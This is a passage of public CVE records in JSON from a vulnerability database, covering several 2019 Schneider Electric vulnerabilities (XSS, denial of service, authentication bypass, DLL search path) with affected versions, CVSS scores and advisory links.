"value": "A Cross-Site Scripting (XSS) CWE-79 vulnerability exists in U.motion Server (MEG6501-0001 - U.motion KNX server, MEG6501-0002 - U.motion KNX Server Plus, MEG6260-0410 - U.motion KNX Server Plus, Touch 10, MEG6260-0415 - U.motion KNX Server Plus, Touch 15), which could allow an attacker to inject client-side script when a user visits a web page."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "Cross-Site Scripting (XSS) CWE-79",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-09-17T19:13:26.000Z",
"orgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"shortName": "schneider"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://www.schneider-electric.com/ww/en/download/document/SEVD-2019-253-01"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cybersecurity@schneider-electric.com",
"ID": "CVE-2019-6835",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "U.motion Server",
"version": {
"version_data": [
{
"version_value": "MEG6501-0001 - U.motion KNX server"
},
{
"version_value": "MEG6501-0002 - U.motion KNX Server Plus"
},
{
"version_value": "MEG6260-0410 - U.motion KNX Server Plus"
},
{
"version_value": "Touch 10"
},
{
"version_value": "MEG6260-0415 - U.motion KNX Server Plus"
},
{
"version_value": "Touch 15"
}
]
}
}
]
},
"vendor_name": "Schneider Electric SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A Cross-Site Scripting (XSS) CWE-79 vulnerability exists in U.motion Server (MEG6501-0001 - U.motion KNX server, MEG6501-0002 - U.motion KNX Server Plus, MEG6260-0410 - U.motion KNX Server Plus, Touch 10, MEG6260-0415 - U.motion KNX Server Plus, Touch 15), which could allow an attacker to inject client-side script when a user visits a web page."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Cross-Site Scripting (XSS) CWE-79"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.schneider-electric.com/ww/en/download/document/SEVD-2019-253-01",
"refsource": "CONFIRM",
"url": "https://www.schneider-electric.com/ww/en/download/document/SEVD-2019-253-01"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"assignerShortName": "schneider",
"cveId": "CVE-2019-6835",
"datePublished": "2019-09-17T19:13:26.000Z",
"dateReserved": "2019-01-25T00:00:00.000Z",
"dateUpdated": "2024-08-04T20:31:04.391Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2019-6833 (GCVE-0-2019-6833)
Vulnerability from nvd – Published: 2019-09-17 19:36 – Updated: 2025-09-30 14:36- CWE-754 - – Improper Check for Unusual or Exceptional Conditions
| URL | Tags |
|---|---|
| https://www.schneider-electric.com/ww/en/download… | x_refsource_CONFIRM |
| https://security.cse.iitk.ac.in/responsible-disclosure | x_refsource_MISC |
| Vendor | Product | Version | |
|---|---|---|---|
| Schneider Electric SE | Magelis HMI Panels |
Affected:
all versions of HMIGTO
Affected: all versions of HMISTO Affected: all versions of XBTGH Affected: all versions of HMIGTU Affected: all versions of HMIGTUX Affected: all versions of HMISCU Affected: all versions of HMISTU Affected: all versions of XBTGT Affected: all versions of HMIGXO Affected: all versions of HMIGXU |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T20:31:04.400Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://www.schneider-electric.com/ww/en/download/document/SEVD-2019-225-01"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://security.cse.iitk.ac.in/responsible-disclosure"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2019-6833",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-09-30T14:36:06.892056Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-09-30T14:36:19.669Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Magelis HMI Panels",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "all versions of HMIGTO"
},
{
"status": "affected",
"version": "all versions of HMISTO"
},
{
"status": "affected",
"version": "all versions of XBTGH"
},
{
"status": "affected",
"version": "all versions of HMIGTU"
},
{
"status": "affected",
"version": "all versions of HMIGTUX"
},
{
"status": "affected",
"version": "all versions of HMISCU"
},
{
"status": "affected",
"version": "all versions of HMISTU"
},
{
"status": "affected",
"version": "all versions of XBTGT"
},
{
"status": "affected",
"version": "all versions of HMIGXO"
},
{
"status": "affected",
"version": "all versions of HMIGXU"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A CWE-754 \u2013 Improper Check for Unusual or Exceptional Conditions vulnerability exists in Magelis HMI Panels (all versions of - HMIGTO, HMISTO, XBTGH, HMIGTU, HMIGTUX, HMISCU, HMISTU, XBTGT, XBTGT, HMIGXO, HMIGXU), which could cause a temporary freeze of the HMI when a high rate of frames is received. When the attack stops, the buffered commands are processed by the HMI panel."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-754",
"description": "CWE-754 \u2013 Improper Check for Unusual or Exceptional Conditions",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-10-02T12:13:24.000Z",
"orgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"shortName": "schneider"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://www.schneider-electric.com/ww/en/download/document/SEVD-2019-225-01"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://security.cse.iitk.ac.in/responsible-disclosure"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cybersecurity@schneider-electric.com",
"ID": "CVE-2019-6833",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Magelis HMI Panels",
"version": {
"version_data": [
{
"version_value": "all versions of HMIGTO"
},
{
"version_value": "all versions of HMISTO"
},
{
"version_value": "all versions of XBTGH"
},
{
"version_value": "all versions of HMIGTU"
},
{
"version_value": "all versions of HMIGTUX"
},
{
"version_value": "all versions of HMISCU"
},
{
"version_value": "all versions of HMISTU"
},
{
"version_value": "all versions of XBTGT"
},
{
"version_value": "all versions of XBTGT"
},
{
"version_value": "all versions of HMIGXO"
},
{
"version_value": "all versions of HMIGXU"
}
]
}
}
]
},
"vendor_name": "Schneider Electric SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A CWE-754 \u2013 Improper Check for Unusual or Exceptional Conditions vulnerability exists in Magelis HMI Panels (all versions of - HMIGTO, HMISTO, XBTGH, HMIGTU, HMIGTUX, HMISCU, HMISTU, XBTGT, XBTGT, HMIGXO, HMIGXU), which could cause a temporary freeze of the HMI when a high rate of frames is received. When the attack stops, the buffered commands are processed by the HMI panel."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-754 \u2013 Improper Check for Unusual or Exceptional Conditions"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.schneider-electric.com/ww/en/download/document/SEVD-2019-225-01",
"refsource": "CONFIRM",
"url": "https://www.schneider-electric.com/ww/en/download/document/SEVD-2019-225-01"
},
{
"name": "https://security.cse.iitk.ac.in/responsible-disclosure",
"refsource": "MISC",
"url": "https://security.cse.iitk.ac.in/responsible-disclosure"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"assignerShortName": "schneider",
"cveId": "CVE-2019-6833",
"datePublished": "2019-09-17T19:36:57.000Z",
"dateReserved": "2019-01-25T00:00:00.000Z",
"dateUpdated": "2025-09-30T14:36:19.669Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2019-6832 (GCVE-0-2019-6832)
Vulnerability from nvd – Published: 2019-09-17 19:31 – Updated: 2024-08-04 20:31- CWE-287 - Authentication
| URL | Tags |
|---|---|
| https://www.schneider-electric.com/en/download/do… | x_refsource_CONFIRM |
| Vendor | Product | Version | |
|---|---|---|---|
| Schneider Electric SE | spaceLYnk |
Affected:
all versions before 2.4.0
|
|
| Schneider Electric SE | Wiser for KNX |
Affected:
all versions before 2.4.0 - formerly known as homeLYnk
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T20:31:04.434Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-225-07/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "spaceLYnk",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "all versions before 2.4.0"
}
]
},
{
"product": "Wiser for KNX",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "all versions before 2.4.0 - formerly known as homeLYnk"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A CWE-287: Authentication vulnerability exists in spaceLYnk (all versions before 2.4.0) and Wiser for KNX (all versions before 2.4.0 - formerly known as homeLYnk), which could cause loss of control when an attacker bypasses the authentication."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-287",
"description": "CWE-287: Authentication",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-09-17T19:31:14.000Z",
"orgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"shortName": "schneider"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-225-07/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cybersecurity@schneider-electric.com",
"ID": "CVE-2019-6832",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "spaceLYnk",
"version": {
"version_data": [
{
"version_value": "all versions before 2.4.0"
}
]
}
},
{
"product_name": "Wiser for KNX",
"version": {
"version_data": [
{
"version_value": "all versions before 2.4.0 - formerly known as homeLYnk"
}
]
}
}
]
},
"vendor_name": "Schneider Electric SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A CWE-287: Authentication vulnerability exists in spaceLYnk (all versions before 2.4.0) and Wiser for KNX (all versions before 2.4.0 - formerly known as homeLYnk), which could cause loss of control when an attacker bypasses the authentication."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-287: Authentication"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.schneider-electric.com/en/download/document/SEVD-2019-225-07/",
"refsource": "CONFIRM",
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-225-07/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"assignerShortName": "schneider",
"cveId": "CVE-2019-6832",
"datePublished": "2019-09-17T19:31:14.000Z",
"dateReserved": "2019-01-25T00:00:00.000Z",
"dateUpdated": "2024-08-04T20:31:04.434Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2019-6831 (GCVE-0-2019-6831)
Vulnerability from nvd – Published: 2019-09-17 19:22 – Updated: 2024-08-04 20:31- CWE-754 - Improper Check for Unusual or Exceptional Conditions
| URL | Tags |
|---|---|
| https://www.schneider-electric.com/en/download/do… | x_refsource_CONFIRM |
| https://security.cse.iitk.ac.in/responsible-disclosure | x_refsource_MISC |
| Vendor | Product | Version | |
|---|---|---|---|
| Schneider Electric SE | BMXNOR0200H Ethernet / Serial RTU module |
Affected:
all firmware versions
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T20:31:04.375Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-225-03/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://security.cse.iitk.ac.in/responsible-disclosure"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "BMXNOR0200H Ethernet / Serial RTU module",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "all firmware versions"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists in BMXNOR0200H Ethernet / Serial RTU module (all firmware versions), which could cause disconnection of active connections when an unusually high number of IEC 60870- 5-104 packets are received by the module on port 2404/TCP."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-754",
"description": "CWE-754: Improper Check for Unusual or Exceptional Conditions",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-10-02T12:12:31.000Z",
"orgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"shortName": "schneider"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-225-03/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://security.cse.iitk.ac.in/responsible-disclosure"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cybersecurity@schneider-electric.com",
"ID": "CVE-2019-6831",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "BMXNOR0200H Ethernet / Serial RTU module",
"version": {
"version_data": [
{
"version_value": "all firmware versions"
}
]
}
}
]
},
"vendor_name": "Schneider Electric SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists in BMXNOR0200H Ethernet / Serial RTU module (all firmware versions), which could cause disconnection of active connections when an unusually high number of IEC 60870- 5-104 packets are received by the module on port 2404/TCP."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-754: Improper Check for Unusual or Exceptional Conditions"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.schneider-electric.com/en/download/document/SEVD-2019-225-03/",
"refsource": "CONFIRM",
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-225-03/"
},
{
"name": "https://security.cse.iitk.ac.in/responsible-disclosure",
"refsource": "MISC",
"url": "https://security.cse.iitk.ac.in/responsible-disclosure"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"assignerShortName": "schneider",
"cveId": "CVE-2019-6831",
"datePublished": "2019-09-17T19:22:59.000Z",
"dateReserved": "2019-01-25T00:00:00.000Z",
"dateUpdated": "2024-08-04T20:31:04.375Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2019-6830 (GCVE-0-2019-6830)
Vulnerability from nvd – Published: 2019-09-17 19:21 – Updated: 2024-08-04 20:31- CWE-248 - Uncaught Exception
| URL | Tags |
|---|---|
| https://www.schneider-electric.com/en/download/do… | x_refsource_CONFIRM |
| Vendor | Product | Version | |
|---|---|---|---|
| Schneider Electric SE | Modicon M580 |
Affected:
all versions prior to V2.80
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T20:31:04.286Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-134-11/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Modicon M580",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "all versions prior to V2.80"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A CWE-248: Uncaught Exception vulnerability exists IN Modicon M580 all versions prior to V2.80, which could cause a possible denial of service when sending an appropriately timed HTTP request to the controller."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-248",
"description": "CWE-248: Uncaught Exception",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-09-17T19:21:12.000Z",
"orgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"shortName": "schneider"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-134-11/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cybersecurity@schneider-electric.com",
"ID": "CVE-2019-6830",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Modicon M580",
"version": {
"version_data": [
{
"version_value": "all versions prior to V2.80"
}
]
}
}
]
},
"vendor_name": "Schneider Electric SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A CWE-248: Uncaught Exception vulnerability exists IN Modicon M580 all versions prior to V2.80, which could cause a possible denial of service when sending an appropriately timed HTTP request to the controller."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-248: Uncaught Exception"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.schneider-electric.com/en/download/document/SEVD-2019-134-11/",
"refsource": "CONFIRM",
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-134-11/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"assignerShortName": "schneider",
"cveId": "CVE-2019-6830",
"datePublished": "2019-09-17T19:21:12.000Z",
"dateReserved": "2019-01-25T00:00:00.000Z",
"dateUpdated": "2024-08-04T20:31:04.286Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2019-6829 (GCVE-0-2019-6829)
Vulnerability from nvd – Published: 2019-09-17 19:44 – Updated: 2026-05-29 14:35- CWE-248 - A CWE-248: Uncaught Exception
| URL | Tags |
|---|---|
| https://www.schneider-electric.com/en/download/do… | x_refsource_CONFIRM |
| Vendor | Product | Version | |
|---|---|---|---|
| Schneider Electric SE | Modicon M580 |
Affected:
firmware version prior to V2.90
|
|
| Schneider Electric SE | Modicon M340 |
Affected:
firmware version prior to V3.10
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T20:31:04.339Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-134-11/"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2019-6829",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-29T14:34:30.342289Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-29T14:35:20.646Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Modicon M580",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "firmware version prior to V2.90"
}
]
},
{
"product": "Modicon M340",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "firmware version prior to V3.10"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A CWE-248: Uncaught Exception vulnerability exists in Modicon M580 (firmware version prior to V2.90) and Modicon M340 (firmware version prior to V3.10), which could cause a possible denial of service when writing to specific memory addresses in the controller over Modbus."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-248",
"description": "A CWE-248: Uncaught Exception",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-09-17T19:44:12.000Z",
"orgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"shortName": "schneider"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-134-11/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cybersecurity@schneider-electric.com",
"ID": "CVE-2019-6829",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Modicon M580",
"version": {
"version_data": [
{
"version_value": "firmware version prior to V2.90"
}
]
}
},
{
"product_name": "Modicon M340",
"version": {
"version_data": [
{
"version_value": "firmware version prior to V3.10"
}
]
}
}
]
},
"vendor_name": "Schneider Electric SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A CWE-248: Uncaught Exception vulnerability exists in Modicon M580 (firmware version prior to V2.90) and Modicon M340 (firmware version prior to V3.10), which could cause a possible denial of service when writing to specific memory addresses in the controller over Modbus."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "A CWE-248: Uncaught Exception"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.schneider-electric.com/en/download/document/SEVD-2019-134-11/",
"refsource": "CONFIRM",
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-134-11/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"assignerShortName": "schneider",
"cveId": "CVE-2019-6829",
"datePublished": "2019-09-17T19:44:12.000Z",
"dateReserved": "2019-01-25T00:00:00.000Z",
"dateUpdated": "2026-05-29T14:35:20.646Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2019-6828 (GCVE-0-2019-6828)
Vulnerability from nvd – Published: 2019-09-17 19:59 – Updated: 2024-08-04 20:31- CWE-248 - Uncaught Exception
| URL | Tags |
|---|---|
| https://www.schneider-electric.com/en/download/do… | x_refsource_CONFIRM |
| Vendor | Product | Version | |
|---|---|---|---|
| Schneider Electric SE | Modicon M580 |
Affected:
firmware version prior to V2.90
|
|
| Schneider Electric SE | Modicon M340 |
Affected:
firmware version prior to V3.10
|
|
| Schneider Electric SE | Modicon Premium |
Affected:
all versions
|
|
| Schneider Electric SE | Modicon Quantum |
Affected:
all versions
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T20:31:04.247Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-134-11/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Modicon M580",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "firmware version prior to V2.90"
}
]
},
{
"product": "Modicon M340",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "firmware version prior to V3.10"
}
]
},
{
"product": "Modicon Premium",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "all versions"
}
]
},
{
"product": "Modicon Quantum",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "all versions"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A CWE-248: Uncaught Exception vulnerability exists Modicon M580 (firmware version prior to V2.90), Modicon M340 (firmware version prior to V3.10), Modicon Premium (all versions), and Modicon Quantum (all versions), which could cause a possible denial of service when reading specific coils and registers in the controller over Modbus."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-248",
"description": "CWE-248: Uncaught Exception",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-09-17T19:59:33.000Z",
"orgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"shortName": "schneider"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-134-11/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cybersecurity@schneider-electric.com",
"ID": "CVE-2019-6828",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Modicon M580",
"version": {
"version_data": [
{
"version_value": "firmware version prior to V2.90"
}
]
}
},
{
"product_name": "Modicon M340",
"version": {
"version_data": [
{
"version_value": "firmware version prior to V3.10"
}
]
}
},
{
"product_name": "Modicon Premium",
"version": {
"version_data": [
{
"version_value": "all versions"
}
]
}
},
{
"product_name": "Modicon Quantum",
"version": {
"version_data": [
{
"version_value": "all versions"
}
]
}
}
]
},
"vendor_name": "Schneider Electric SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A CWE-248: Uncaught Exception vulnerability exists Modicon M580 (firmware version prior to V2.90), Modicon M340 (firmware version prior to V3.10), Modicon Premium (all versions), and Modicon Quantum (all versions), which could cause a possible denial of service when reading specific coils and registers in the controller over Modbus."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-248: Uncaught Exception"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.schneider-electric.com/en/download/document/SEVD-2019-134-11/",
"refsource": "CONFIRM",
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-134-11/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"assignerShortName": "schneider",
"cveId": "CVE-2019-6828",
"datePublished": "2019-09-17T19:59:33.000Z",
"dateReserved": "2019-01-25T00:00:00.000Z",
"dateUpdated": "2024-08-04T20:31:04.247Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2019-6826 (GCVE-0-2019-6826)
Vulnerability from nvd – Published: 2019-09-17 19:57 – Updated: 2024-08-04 20:31- CWE-426 - Untrusted Search Path
| URL | Tags |
|---|---|
| https://www.schneider-electric.com/en/download/do… | x_refsource_CONFIRM |
| Vendor | Product | Version | |
|---|---|---|---|
| Schneider Electric SE | SoMachine HVAC |
Affected:
v2.4.1 and earlier versions
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T20:31:04.358Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-225-04/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "SoMachine HVAC",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "v2.4.1 and earlier versions"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A CWE-426: Untrusted Search Path vulnerability exists in SoMachine HVAC v2.4.1 and earlier versions, which could cause arbitrary code execution on the system running SoMachine HVAC when a malicious DLL library is loaded by the product."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-426",
"description": "CWE-426: Untrusted Search Path",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-09-17T19:57:55.000Z",
"orgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"shortName": "schneider"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-225-04/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cybersecurity@schneider-electric.com",
